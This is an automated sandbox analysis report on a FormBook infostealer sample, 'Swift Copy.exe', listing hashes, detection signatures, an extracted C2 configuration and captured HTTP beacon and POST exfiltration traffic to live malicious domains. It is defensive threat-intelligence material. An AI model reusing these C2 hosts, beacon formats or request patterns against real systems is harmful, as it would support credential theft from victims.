Windows Analysis Report
Swift Copy.exe

Overview

General Information

Sample Name: Swift Copy.exe
Analysis ID: 682145
MD5: 50d4fb3f5a33007c2f80e5bbaa5e0ccd
SHA1: 26ff500d90184b5e7928cb16e92bbe0e4553e95e
SHA256: 0bacce1f09d476c0b84cd699b50152a74dd6bfd2a052749d7b5a3f4a4ae7b7d9
Tags: exeFormbook
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: Swift Copy.exe Virustotal: Detection: 21% Perma Link
Source: Swift Copy.exe ReversingLabs: Detection: 19%
Yara detected FormBook
Source: Yara match File source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.epic45.co.uk/bwe0/?9rV8zl=21tjbkChbFWznsu0s5dQgMCLDQHTp3tJL/2kMDFZYsfdSZfl+tTwQu/FIpmHzzlEQrwumqO36HFfwo3EfD1Crt0mHKlMwrNEfw==&YN9=w6PTp6pp-Zfte2a0 Avira URL Cloud: Label: malware
Source: http://www.kinemartigues.com/bwe0/ Avira URL Cloud: Label: malware
Source: http://www.epic45.co.uk/bwe0/ Avira URL Cloud: Label: malware
Source: www.my1245.com/bwe0/ Avira URL Cloud: Label: malware
Source: http://www.mogdento.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9+phILUgzUwHPh2LCdIS8sbnczPqTtIgth+oM8i1bVTrz46wPYQwCayAKWOCT9dODOCAwfo9QBDVHWgp/MlMRCDLLRs2he6w== Avira URL Cloud: Label: malware
Source: http://mogdento.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9 Avira URL Cloud: Label: malware
Source: http://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB+LrmWtJBQqMyCe4o1I9YkrzlNkt4Y5lQSVrtsHmDN4rDqK6jdbIqfImlF05yj9AnCTnfqfBJ/tqveG/rYA7nf00SA== Avira URL Cloud: Label: malware
Source: http://www.mogdento.com/bwe0/ Avira URL Cloud: Label: malware
Source: http://www.blackyaga.xyz/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=sE+e17jc53oiMc/tXTBrdM81Jmo39pRVgGsWsNeg2yHBZP8DMvAafxUSa5mU59eBVMhEqwjNcWZP/MmjQeTg8VWUgAq2ah5qoA== Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe ReversingLabs: Detection: 19%
Antivirus or Machine Learning detection for unpacked file
Source: 8.0.RegSvcs.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.my1245.com/bwe0/"], "decoy": ["GA8abA96SLI=", "RjM/QAsrNyRPlNEjahNMdKXlPtbXpQ==", "rOQ4ySihIKVFhRnhZxfZ", "iSnyAlGXQBSBwz1C", "SYfcQ54ijGWAuQq1UQTE", "XRcVgsQIO8FVnvCOiHLvE3k=", "K2XLULRJuod6I3dO", "S4oH5i5i3+expw==", "4hZdto3RgCY9esve1k7T5x9YPw==", "fkpgXDuEv2NzvxCcq2AxMnE=", "13czFGvtsco1gf8=", "ub4KhXCsZ/qnnvYTijN3dA==", "WD5IRIcJB51Hfs8grBnldA==", "YqxA1LPudXGKyP1FlQ==", "MZHXMBdZ8Mf2X3ZjSVY=", "7mLLNhchknqdLVbz+6ci4VeD", "66OK6kmRv8N6I3dO", "+97y8jK5vTnIn8crIwyHnRxv03Kp", "PC1PqPJ6573fH0aUnGAxMnE=", "3BFlt4nJcA3Inb3TGO02bq++XzWRMVg=", "JFWj7LK++b1oRUtG", "TbxQMHrFdPd6I3dO", "ltV+Zbop3H8ufAGhzN3O", "mlcxPKADy6TjUdNgnWAxMnE=", "GZlnUCk98Q0sfdIykw==", "ejIKCEuKTCdRrCmEik4Llxxv03Kp", "oBioj+xiThlFleT8Sb2OU6jyDjWRMVg=", "FTiMDEy9JumdFnxiig==", "3F/6yw1VGOkbfvl+wLtBZ+YotQlBMKb8sw==", "gP2ZcmKh5co1gf8=", "QB0tm/t82o5NJ0/hZxfZ", "7p+eEFywCuQDNXv6UOqfYw==", "VT09fVZax5pZOWDL1JH64Ima", "6y+iWKUy3+expw==", "QsByZl2v6YY/IF87hDWDmRtv03Kp", "FMSC3UQG3+expw==", "4iZslO0xz0vUntnn/fX2k6bkRPCE3nhQsQ==", "QALQo+6BigCVFnxiig==", "tGEvL4wVB82JcsmhzN3O", "C3MpKHrHh0hV4B2p4dR3dQ==", "+jBbwhmM9K3ABEXhZxfZ", "Bgtm5ypqp4F6I3dO", "gjAL+kjz7sphJ0zhZxfZ", "XdWUftmHvYF6I3dO", "/72t+jNqjjDTEV4tbVg=", "DogcC2/11HdGqv2BEuHA", "XgwEGD8FXWErZmlI", "i0Ud7r7Ot39AkQrk3Y1frfEsNw==", "ldkwfVSeU9dkhpeknQ==", "Do9QPSpsaYJ6I3dO", "lJCssH2SnGLkU+Y=", "993QLp0nk1yDgZd1rBnldA==", "k8cWkuts5VMbaZ9quHj64Ima", "bF53yjBwIg9H", "BYcZjHa7hWAyFzAQMyg616PYPtbXpQ==", "XFSfGGr2bDP/ebB8x3Izrh5v03Kp", "A8PhVrAswln64jlMWGnQ9pXThRZ8HLyi", "yL3yWzZCyVcmpCbw7q+FFPkIFzWRMVg=", "P8yKVC56enmwYp+HpaPR", "OvT4bdZHwkTRntehzN3O", "re6GEPc19FobfNUkrBnldA==", "3JOU+kudyloQ/zcBR2FgrfEsNw==", "B/cOgMQIHPYjkynCGiG5xbYaGwQ=", "XqQpFlRw8m4bXJt0uZZ12SVNPw=="]}
Uses 32bit PE files
Source: Swift Copy.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Swift Copy.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: RegSvcs.pdb, source: NETSTAT.EXE, 00000019.00000002.518155869.0000000003263000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.282733193.0000000001701000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.279929661.0000000001565000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.513858373.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.357141735.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.359401565.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.516489080.000000000303F000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.282733193.0000000001701000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.279929661.0000000001565000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.513858373.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.357141735.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.359401565.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.516489080.000000000303F000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb source: NETSTAT.EXE, 00000019.00000002.518155869.0000000003263000.00000004.10000000.00040000.00000000.sdmp

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 103.92.235.55 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.mogdento.com
Source: C:\Windows\explorer.exe Network Connect: 103.67.235.120 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 192.3.130.2 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 85.159.66.93 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.kinemartigues.com
Source: C:\Windows\explorer.exe Network Connect: 51.159.175.169 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.blackyaga.xyz
Source: C:\Windows\explorer.exe Domain query: www.epic45.co.uk
Source: C:\Windows\explorer.exe Domain query: www.expectedclosure.one
Uses netstat to query active network connections and open ports
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.blackyaga.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.my1245.com/bwe0/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ZINIOSS-AS-INZiniosInformationTechnologyPvtLtdIN ZINIOSS-AS-INZiniosInformationTechnologyPvtLtdIN
Source: Joe Sandbox View ASN Name: DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=sE+e17jc53oiMc/tXTBrdM81Jmo39pRVgGsWsNeg2yHBZP8DMvAafxUSa5mU59eBVMhEqwjNcWZP/MmjQeTg8VWUgAq2ah5qoA== HTTP/1.1Host: www.blackyaga.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bwe0/?9rV8zl=z0a7bU3Grk9SZV+rn0o4us/noU2vzWsLY51yg1R10n5VTVON6q0J/IdVbRNrmdil3H/zWNK1GQbVnCycFh7AKivH+ief+xiP+g==&YN9=w6PTp6pp-Zfte2a0 HTTP/1.1Host: www.expectedclosure.oneConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB+LrmWtJBQqMyCe4o1I9YkrzlNkt4Y5lQSVrtsHmDN4rDqK6jdbIqfImlF05yj9AnCTnfqfBJ/tqveG/rYA7nf00SA== HTTP/1.1Host: www.kinemartigues.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bwe0/?9rV8zl=21tjbkChbFWznsu0s5dQgMCLDQHTp3tJL/2kMDFZYsfdSZfl+tTwQu/FIpmHzzlEQrwumqO36HFfwo3EfD1Crt0mHKlMwrNEfw==&YN9=w6PTp6pp-Zfte2a0 HTTP/1.1Host: www.epic45.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9+phILUgzUwHPh2LCdIS8sbnczPqTtIgth+oM8i1bVTrz46wPYQwCayAKWOCT9dODOCAwfo9QBDVHWgp/MlMRCDLLRs2he6w== HTTP/1.1Host: www.mogdento.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 103.67.235.120 103.67.235.120
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /bwe0/ HTTP/1.1Host: www.expectedclosure.oneConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.expectedclosure.oneUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.expectedclosure.one/bwe0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 39 72 56 38 7a 6c 3d 7e 32 79 62 59 68 7a 7a 38 51 68 46 58 58 28 4a 67 53 55 6c 6f 2d 48 71 71 46 7a 32 35 55 73 73 50 4a 64 6e 6e 78 4e 52 75 45 56 76 44 41 36 6b 34 49 41 4c 69 64 64 7a 56 52 38 2d 71 61 6e 6a 7a 56 6a 6b 45 76 48 4f 4f 33 6e 49 77 43 79 55 49 42 75 61 44 77 50 31 32 7a 6e 6b 36 69 36 48 34 61 32 52 46 74 70 30 57 46 4f 6a 66 66 79 38 4e 53 70 53 77 79 64 5a 78 55 45 34 31 57 42 39 66 32 47 33 42 79 62 33 7a 6d 34 42 33 63 52 46 44 43 6b 48 6c 38 4d 34 6e 4e 4b 53 39 78 66 6a 30 62 37 4b 4c 50 55 75 75 4a 30 57 41 4e 30 61 6c 6d 38 57 52 63 34 63 77 46 6d 5f 4e 4b 44 32 71 70 59 38 49 37 78 39 28 46 57 30 36 66 63 68 74 42 71 6c 7e 33 49 38 75 6c 52 41 63 31 36 4d 45 6c 76 75 66 4a 68 31 5a 49 62 55 6a 33 6c 36 41 2d 33 6f 33 6c 4b 43 78 41 41 58 33 57 32 33 34 74 48 6a 42 4f 28 5a 7a 38 5a 76 78 4d 51 6f 37 6a 64 59 58 2d 46 6b 54 6e 39 62 69 6f 4b 74 55 68 78 4e 45 55 31 73 66 79 33 5f 52 4d 68 4a 64 51 74 49 59 67 76 52 6c 37 54 37 67 62 69 6e 54 74 7e 38 54 2d 57 62 51 36 74 77 42 48 77 66 71 45 53 50 7a 39 70 31 4a 58 46 4e 34 37 67 33 67 68 7e 4f 47 49 4a 4b 56 42 52 67 30 6b 68 59 33 50 79 37 7e 46 6d 76 66 7a 7a 58 30 57 6b 69 46 68 6e 6c 32 53 45 67 57 71 46 39 6e 46 70 70 39 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 9rV8zl=~2ybYhzz8QhFXX(JgSUlo-HqqFz25UssPJdnnxNRuEVvDA6k4IALiddzVR8-qanjzVjkEvHOO3nIwCyUIBuaDwP12znk6i6H4a2RFtp0WFOjffy8NSpSwydZxUE41WB9f2G3Byb3zm4B3cRFDCkHl8M4nNKS9xfj0b7KLPUuuJ0WAN0alm8WRc4cwFm_NKD2qpY8I7x9(FW06fchtBql~3I8ulRAc16MElvufJh1ZIbUj3l6A-3o3lKCxAAX3W234tHjBO(Zz8ZvxMQo7jdYX-FkTn9bioKtUhxNEU1sfy3_RMhJdQtIYgvRl7T7gbinTt~8T-WbQ6twBHwfqESPz9p1JXFN47g3gh~OGIJKVBRg0khY3Py7~FmvfzzX0WkiFhnl2SEgWqF9nFpp9g).
Source: global traffic HTTP traffic detected: POST /bwe0/ HTTP/1.1Host: www.kinemartigues.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.kinemartigues.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kinemartigues.com/bwe0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 39 72 56 38 7a 6c 3d 42 35 56 53 6a 37 71 39 4f 72 72 58 74 30 51 79 4f 33 7e 74 35 48 47 34 67 51 31 49 59 47 6a 41 6b 72 34 67 72 63 6c 73 51 54 5a 79 67 4a 6d 79 43 5a 56 7a 4f 61 65 35 6d 38 72 2d 70 4f 67 62 72 55 73 35 73 78 63 45 71 6a 7a 63 62 49 6a 59 62 75 49 6d 6f 38 36 54 73 4a 73 4e 69 73 59 4d 4d 6a 4b 71 35 66 63 31 77 49 6d 69 59 46 41 31 64 32 6c 75 59 43 73 62 4b 49 57 31 32 2d 4d 51 46 43 6f 7a 64 79 6d 4a 69 37 6e 30 65 58 79 5f 37 5f 38 6a 28 6c 75 66 35 59 31 6d 66 4e 71 6c 56 61 78 45 37 35 63 6a 33 5a 66 61 6f 33 6e 4f 43 30 50 6b 31 57 54 43 28 33 4f 55 42 64 69 65 5a 4a 55 76 4b 6a 65 44 36 41 69 53 6e 43 59 6f 28 46 70 64 39 32 50 7a 6a 7a 51 54 43 64 43 56 63 32 38 74 51 58 67 56 37 52 34 42 71 2d 4b 37 64 4a 5a 76 39 48 6b 31 39 6a 65 35 51 75 34 50 7e 58 64 54 33 56 79 47 48 33 4c 5a 57 45 6c 76 45 65 77 67 44 33 67 6c 35 42 28 73 5a 34 31 47 71 34 7e 39 30 59 6c 33 5a 37 57 51 34 4f 55 67 6b 67 4d 57 67 45 4f 37 4d 48 72 6d 34 72 4d 74 33 38 57 78 53 31 57 56 49 5a 5a 32 38 6d 74 7a 67 45 4f 4d 35 62 5a 62 28 6e 64 61 7a 59 5a 4a 56 78 4c 39 5a 6a 59 4d 4d 41 48 58 47 4b 4b 35 30 6d 37 58 54 74 61 57 63 74 7a 4a 35 52 42 57 71 6c 74 7a 6d 59 62 62 72 43 6d 74 65 62 4a 55 6b 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 9rV8zl=B5VSj7q9OrrXt0QyO3~t5HG4gQ1IYGjAkr4grclsQTZygJmyCZVzOae5m8r-pOgbrUs5sxcEqjzcbIjYbuImo86TsJsNisYMMjKq5fc1wImiYFA1d2luYCsbKIW12-MQFCozdymJi7n0eXy_7_8j(luf5Y1mfNqlVaxE75cj3Zfao3nOC0Pk1WTC(3OUBdieZJUvKjeD6AiSnCYo(Fpd92PzjzQTCdCVc28tQXgV7R4Bq-K7dJZv9Hk19je5Qu4P~XdT3VyGH3LZWElvEewgD3gl5B(sZ41Gq4~90Yl3Z7WQ4OUgkgMWgEO7MHrm4rMt38WxS1WVIZZ28mtzgEOM5bZb(ndazYZJVxL9ZjYMMAHXGKK50m7XTtaWctzJ5RBWqltzmYbbrCmtebJUkA).
Source: global traffic HTTP traffic detected: POST /bwe0/ HTTP/1.1Host: www.epic45.co.ukConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.epic45.co.ukUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.epic45.co.uk/bwe0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 39 72 56 38 7a 6c 3d 37 33 46 44 59 52 4b 62 51 55 65 6b 6e 4e 72 35 6d 35 77 70 70 4a 66 6a 4c 6a 65 54 6b 43 74 32 64 71 71 4c 43 68 42 78 62 34 65 36 59 73 33 4f 32 5f 28 78 59 74 54 62 4d 4b 4f 35 7a 42 4d 4b 54 49 63 4d 35 6f 54 4e 39 58 42 31 36 72 58 36 57 7a 41 37 72 66 6b 73 4e 4a 70 74 34 59 78 54 55 6e 39 59 71 34 39 46 4f 42 49 48 46 48 59 74 57 47 62 38 69 5a 4b 46 7e 4e 63 39 41 36 42 6c 39 68 4e 43 76 6d 73 57 75 75 77 50 4e 5a 7e 32 7e 33 39 74 69 42 75 4f 56 36 45 7a 79 69 54 57 59 48 42 4f 42 49 74 6d 6a 5a 4e 68 31 42 47 50 35 49 69 78 6f 65 76 65 63 52 45 53 6e 66 50 43 78 50 5a 4a 72 75 77 78 30 72 6d 68 74 6a 34 75 5a 41 50 46 71 5f 59 6a 61 4b 4b 36 53 71 7e 68 55 46 6e 44 67 37 54 38 41 36 52 2d 77 33 4c 54 57 41 30 52 4b 5a 77 30 31 69 33 4d 72 45 32 35 38 63 46 6d 74 4d 39 5a 35 54 7a 31 41 69 38 4e 45 32 6d 67 36 64 37 65 41 59 46 5f 30 6f 77 64 77 6c 45 51 56 44 51 65 51 4a 78 50 59 2d 61 4e 72 52 36 57 67 62 30 4f 4b 34 37 63 41 72 34 5a 4b 6b 6c 75 6f 63 36 75 36 46 4d 61 62 5a 42 32 74 63 70 49 6f 7a 73 63 75 72 32 43 75 34 46 44 73 77 77 5f 4c 69 48 41 32 66 6e 2d 59 53 7e 64 58 37 32 42 74 37 4d 61 57 67 31 57 67 6d 42 78 77 38 63 31 28 76 66 70 38 4e 69 7a 79 50 53 4a 67 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 9rV8zl=73FDYRKbQUeknNr5m5wppJfjLjeTkCt2dqqLChBxb4e6Ys3O2_(xYtTbMKO5zBMKTIcM5oTN9XB16rX6WzA7rfksNJpt4YxTUn9Yq49FOBIHFHYtWGb8iZKF~Nc9A6Bl9hNCvmsWuuwPNZ~2~39tiBuOV6EzyiTWYHBOBItmjZNh1BGP5IixoevecRESnfPCxPZJruwx0rmhtj4uZAPFq_YjaKK6Sq~hUFnDg7T8A6R-w3LTWA0RKZw01i3MrE258cFmtM9Z5Tz1Ai8NE2mg6d7eAYF_0owdwlEQVDQeQJxPY-aNrR6Wgb0OK47cAr4ZKkluoc6u6FMabZB2tcpIozscur2Cu4FDsww_LiHA2fn-YS~dX72Bt7MaWg1WgmBxw8c1(vfp8NizyPSJgQ).
Source: global traffic HTTP traffic detected: POST /bwe0/ HTTP/1.1Host: www.mogdento.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.mogdento.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mogdento.com/bwe0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 39 72 56 38 7a 6c 3d 54 48 56 65 71 57 49 4c 62 30 44 33 79 56 36 4d 38 64 75 30 4f 69 77 5f 64 46 49 30 49 61 53 46 4c 6e 77 7a 28 37 6f 72 6e 33 48 6a 64 75 7a 78 79 7a 47 48 61 41 50 6b 37 77 57 49 47 67 71 37 5a 63 6e 77 56 53 39 2d 71 76 63 72 4f 30 6a 70 67 63 61 54 79 38 56 78 56 37 54 46 72 54 4a 33 35 46 48 49 45 79 68 6f 76 33 65 70 64 76 42 4d 66 39 34 41 79 6a 47 2d 49 52 6f 34 6f 64 59 4f 4b 6f 37 58 74 64 5a 36 6f 74 47 71 30 7a 48 6f 49 74 62 39 6d 78 78 74 4d 51 56 2d 7e 64 75 43 63 78 63 2d 38 36 7a 31 38 4f 53 77 31 4a 6b 6a 4e 32 4b 6b 76 4b 43 76 50 39 34 41 56 79 6a 78 56 38 67 6a 6a 32 30 45 4b 39 41 38 45 50 48 43 71 76 49 4c 62 4d 28 74 62 71 46 6b 42 33 7e 4f 30 49 6b 36 69 73 46 52 62 75 75 78 7e 51 28 62 50 6d 5a 78 78 6c 43 43 70 70 69 5f 7e 4f 4c 77 49 68 4d 67 30 33 28 6e 59 78 32 64 56 31 35 4e 37 66 46 48 77 67 65 4a 68 59 4a 53 28 2d 7e 54 76 35 4f 33 47 4c 46 30 75 51 30 4b 69 49 34 74 48 41 44 55 6f 67 66 33 38 68 6b 41 4c 5f 4d 70 6c 4d 38 53 46 6a 39 45 4a 48 66 4b 6e 38 54 6d 66 31 77 43 63 5f 42 32 5a 71 59 31 59 4a 52 73 33 76 57 58 73 58 5a 41 68 73 4c 62 4c 59 59 33 56 5f 64 36 31 71 56 34 41 66 7e 79 65 6d 57 78 50 69 4d 6e 50 61 43 39 46 61 57 69 57 6c 4b 55 65 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 9rV8zl=THVeqWILb0D3yV6M8du0Oiw_dFI0IaSFLnwz(7orn3HjduzxyzGHaAPk7wWIGgq7ZcnwVS9-qvcrO0jpgcaTy8VxV7TFrTJ35FHIEyhov3epdvBMf94AyjG-IRo4odYOKo7XtdZ6otGq0zHoItb9mxxtMQV-~duCcxc-86z18OSw1JkjN2KkvKCvP94AVyjxV8gjj20EK9A8EPHCqvILbM(tbqFkB3~O0Ik6isFRbuux~Q(bPmZxxlCCppi_~OLwIhMg03(nYx2dV15N7fFHwgeJhYJS(-~Tv5O3GLF0uQ0KiI4tHADUogf38hkAL_MplM8SFj9EJHfKn8Tmf1wCc_B2ZqY1YJRs3vWXsXZAhsLbLYY3V_d61qV4Af~yemWxPiMnPaC9FaWiWlKUew).
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 11 Aug 2022 04:29:41 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 9X-Rate-Limit-Reset: 2022-08-11T04:29:46.0784500Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 11 Aug 2022 04:30:01 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 393Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 65 70 69 63 34 35 2e 63 6f 2e 75 6b 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at epic45.co.uk Port 80</address></body></html>
